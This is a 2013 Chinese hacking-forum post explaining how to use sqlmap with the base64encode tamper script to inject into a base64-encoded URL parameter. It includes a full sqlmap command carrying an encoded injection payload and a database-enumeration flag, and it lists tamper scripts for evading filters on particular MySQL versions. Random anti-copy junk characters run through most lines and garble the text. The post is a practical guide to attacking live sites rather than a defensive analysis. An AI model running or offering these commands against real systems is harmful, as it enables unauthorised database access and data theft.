找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2293|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
5 O5 a, p# `0 S0 r5 {- Q8 C! p4 B3 o2 I7 i# j( F# k
sqlmap的tamper里有个base64encode.py
/ T  O, j0 Z' t
8 c( \" q8 [# S& v使用如下% B$ q9 h) \# ?( `

; c7 D# o: p' G2 lsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
. S8 {2 X, m8 b. u% `! {) X" @/ u7 E5 P5 z2 V! f/ i
6 Q" \7 I, _' g/ _
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
: U- m# W6 {' |) @. n" R( K
8 C& W, C" L: \9 e: e5 |9 Y# L其中常用到的bypass脚本绕过SQLMAP主要两个脚本:. N6 B/ |, M5 m
/ X+ n4 U$ \* x" H
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
0 C# I6 D* F' U6 e9 p  w# Rspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
+ r7 |& X. Z3 `" v首先确定目标数据库版本,然后选择相应的脚本。
+ Z, K5 ]! S% e; S" ~* A# F# f- [-v 3 --batch --tamper "space2hash.py"# d- t% o! P' C& s$ @% Y

3 R( a$ i- k: v: ]还有其他一些插件:1 g0 m, }# a+ |
encodes编码 ——charencode.py
7 D4 m3 b% m; \" x" I2 kbase64编码 —— base64encode.py
3 q9 c3 c1 V) {* C替换空格和关键字 —— halfversionedmorekeywords.py0 z9 n. w* [- f: x3 G+ u

* X0 }' K( r% u- R4 _. r# z0 y2 b1 X% L5 {, J' M! k% @
: X: N' H$ |$ c7 B

. R3 P6 x7 I+ d, R) q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表